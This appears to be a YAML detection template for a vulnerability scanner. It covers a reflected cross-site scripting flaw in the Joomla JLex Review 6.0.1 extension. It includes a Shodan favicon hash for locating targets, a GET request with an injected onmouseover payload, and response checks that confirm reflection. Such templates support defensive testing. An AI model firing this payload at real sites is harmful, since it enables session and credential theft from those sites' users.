product: Joomla
vName: Joomla JLex Review 6.0.1 - Cross-Site Scripting
type: 跨站脚本
vID: [ ]
level: 2
vDesc: The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials.
version: ''
note: ''
search:
  shodan: http.favicon.hash:-1950415971
protocol: http
link: https://www.exploitalert.com/view-details.html?id=39732
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /?review_id=1&itwed%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22b7yzn=1
    verify:
      logic: and
      check:
        - body:
            value:
              - <a href="/?itwed"onmouseover="confirm(document.domain)"style=
              - jlex-review
            logic: and
        - status: 200
